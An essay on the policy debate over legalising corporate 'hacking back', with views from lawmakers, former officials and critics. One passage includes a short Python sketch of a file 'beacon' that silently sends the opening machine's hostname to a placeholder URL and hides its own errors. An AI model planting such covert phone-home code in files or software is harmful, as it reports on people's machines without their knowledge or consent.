There is an old debate (at least, counting in internet years) that tends to crop up after major cybersecurity breaches such as the widespread WannaCry ransomware attack in May. In the aftermath of such incidents, some decry the sorry state of cybersecurity and insist that if only tech firms, with their wealth of resources and technical expertise, were allowed to go after the perpetrators of these attacks, they would do a much better job of stopping the damage and deterring other perpetrators than the slow, plodding, over-worked, under-resourced, jurisdiction-bound law-enforcement agencies.
Which raises a question: Beyond the standard set of protective tools—encryption, firewalls, anti-virus software, intrusion-detection systems, two-factor authentication—should companies be allowed to go outside the boundaries of their own networks and crash the servers that are attacking them, or delete data that has been stolen from them off their adversaries’ machines? The answer of most companies and cybersecurity experts is no. But that doesn’t stop a vocal minority—usually researchers at libertarian think tanks and lawyers concerned by how restrictive anti-hacking regulations have become—from suggesting otherwise.
The notion that companies should be given more leeway to engage in “active defense”—the cybersecurity euphemism for offense—has been quelled for years by the Computer Fraud and Abuse Act (CFAA) in the United States and its counterparts in other countries, which effectively make it illegal for people to access computer systems that don’t belong to them without permission from the owners. But some lawmakers feel the need to carve out an exception to that blanket ban for companies that infiltrate external networks in the name of self-defense. In March, Georgia Representative Tom Graves proposed the Active Cyber Defense Certainty Act (ACDC), which would change the CFAA so that it would not apply to victims of cyberattacks who accessed attackers’ networks to “gather information in order to establish attribution of criminal activity to share with law enforcement” or to “disrupt continued unauthorized activity against the victim’s own network.”
Stewart Baker, a former homeland security assistant secretary under George W. Bush and a current partner at the D.C. law firm Steptoe & Johnson, would also like to see companies be allowed to hack back. A sharp critic of the current state of law enforcement’s cybersecurity efforts, Baker has for years been trying to make it easier for private firms to pursue their adversaries in cyberspace. “For a company to go to the FBI and say ‘I’ve been hacked, can you find the hacker,’ it’s like going to a university town’s police force and saying, ‘Somebody stole my bike’—you’re lucky if they don’t laugh at you,” Baker says. “The government is completely consumed just trying to take care of its own data and tracking its own attackers. It doesn’t have the resources to help firms and probably never will.”
While likening denial-of-service attacks and data breaches to bicycle theft may seem like a stretch, most discussions of cybersecurity laws and policies, for better or for worse, happen by analogy to the physical world. And to Baker, there are two other important ways of thinking about the importance of legislation like the ACDC. One is the widely accepted principle of an organization’s right to defend its own interests. The other is the idea that there are many tiers of people with different responsibilities in between ordinary civilians and actual law enforcement. “In the physical world,” Baker explains, “there are all kinds of people in the middle, between innocent civilians and full-on military and law-enforcement protective personnel, who have intermediary authorities—bounty hunters, private investigators, mall cops—all people who have some additional authority and who ought to be able to use that additional authority because it was deemed necessary not to rely exclusively on the police. If that’s where we end up in the physical world, why would we not welcome the idea of having intermediate authorities between ordinary civilians hunkering down behind their firewalls and the police?”
Baker’s advocacy is driven not by industry interests so much as his own deeply held belief that government officials and law enforcement agencies are incapable of addressing online threats themselves. “It’s like the NRA saying, ‘When seconds count, the police are only minutes away,’ except the police are days away when you’re talking about cybercrime,” Baker says.
Baker and Representative Graves, though, are in the minority. At least among most people willing to speak on the record, legalizing proactive responses to cybercrime is a wildly unpopular idea. Its critics range from law enforcement officials who worry it will lead to confusion in investigating cyberattacks, to lawyers who caution that such activity might well violate foreign laws even if permitted by the U.S., to security advocates who fear it will merely serve as a vehicle for more attacks and greater chaos, particularly if victims incorrectly identify who is attacking them, or even invent or stage fake attacks from adversaries as an excuse for hacking back.
And if big tech firms are clamoring for the opportunity to go after their attackers more aggressively, they are certainly not doing so publicly. “I haven’t heard from particular companies that they want to have that activity authorized,” says Greg Nojeim, the director of the Freedom, Security and Technology Project at the Center for Democracy and Technology, a think tank. At least a couple of companies have actively gone after adversaries in the past—Google reportedly breached a computer in Taiwan in 2010 while investigating attacks on its customers, and in 2014 the FBI examined whether some banks had hired hackers to crash servers being used by Iran—but known examples are few and, on the whole, relatively tame.
“I think a lot of companies would be hesitant to take the position,” Nojeim continued, “that it’s okay to engage in active-defense measures on somebody else’s network out of fear that their own networks would then become targets.” He, like many critics of broad hacking-back legalization, makes certain distinctions for defensive activities he views as less problematic. For instance, he is comfortable with “beaconing,” the practice of attaching code to sensitive files that, if the files are stolen, will report back to their owners the IP addresses of the machines they are copied onto.
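To make the beaconing idea concrete, here is a minimal, purely illustrative sketch in Python. It assumes an owner-controlled endpoint (the placeholder `BEACON_URL` below is hypothetical); when a booby-trapped file is opened on a foreign machine, the embedded code phones home, and the owner’s server learns the machine’s IP address simply from the source of the incoming request—the beacon itself only needs to identify the document and the host.

```python
# Illustrative sketch of "beaconing" — code bundled with a sensitive file
# that reports back to the file's owner when the file is opened elsewhere.
# BEACON_URL is a hypothetical placeholder, not a real service.
import json
import socket
import urllib.request

BEACON_URL = "https://example.com/beacon"  # owner-controlled endpoint (assumed)


def build_payload(document_id: str) -> dict:
    """Describe the machine the file landed on.

    The machine's public IP address does not need to be included: the
    owner's server observes it as the source address of the request.
    """
    return {
        "document": document_id,
        "hostname": socket.gethostname(),
    }


def phone_home(document_id: str) -> None:
    """Send the report; fail silently so the beacon stays unobtrusive."""
    req = urllib.request.Request(
        BEACON_URL,
        data=json.dumps(build_payload(document_id)).encode(),
        headers={"Content-Type": "application/json"},
    )
    try:
        urllib.request.urlopen(req, timeout=5)
    except OSError:
        pass  # no network, or the endpoint is unreachable
```

The key design point—and why critics like Nojeim find beaconing relatively palatable—is that the code runs only when the stolen file is opened and merely reports back; it does not access or alter anything else on the adversary’s machine.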
Others argue that the crucial limits relate to who is permitted to hack back rather than what they are permitted to do. For instance, Jeremy Rabkin, a law professor at George Mason University, has advocated for putting together a list of cybersecurity firms vetted by the U.S. government, so that companies could hire an approved hack-back vendor to go after their online adversaries. “A lot of things can go wrong when people start mucking around in your files and your systems,” Rabkin told me. “You have to trust these people; you have to be sure that they’re not going to steal stuff or tip off other people.” In his estimation, there are only a handful of firms—highly regarded security companies and contractors that have longstanding relationships with the U.S. government and ex-military personnel, mostly—that can be trusted to pull this off.
Michael Chertoff, the former secretary of homeland security under George W. Bush who now runs his own consulting firm, argues that any private firm’s activities should be not only government-approved but also closely coordinated with U.S. officials. “If it’s not done at the direction of the government, then you get into something which is not terribly different from what the Russians do,” he says, referring to the Russian government’s reliance on intelligence gathered by criminals, allowing it to benefit from crimes without accepting responsibility for them. Ultimately, Chertoff doesn’t think that countering cyberattacks is something the government needs help with, or a responsibility it is interested in outsourcing.
Patrick Lin, a professor of philosophy at California Polytechnic State University, has finer-grained logistical concerns about any legislation that opens up the possibility of hacking back, regardless of whether one considers the practice justified. “It is much too premature to allow for hacking back, even if the practice isn’t immoral,” Lin says. “At minimum, there needs to be a clear process to authorize or post-hoc review cyber counterattacks to ensure they’re justified, including penalties for irresponsible attacks. That oversight infrastructure hasn’t even been sketched out.” (There is little discussion of such oversight in the ACDC, though under the most recent discussion draft, released in May, companies would be required to report their activities to the FBI.)
At a moment when most people are concerned with trying to reduce online attacks, proposals to legalize hacking back and encourage more cyber conflict are a bit of an oddity. They rely on the implicit assumption that offense is the best defense, even though offense and defense have, in general, looked entirely different from each other online: The tools for defending computers, like encryption and network monitoring, bear almost no resemblance to the tools used to attack computers, such as botnets and phishing. Legalizing hacking back would conflate those two domains and, in doing so, likely make it that much harder to distinguish between the good guys and the bad guys online.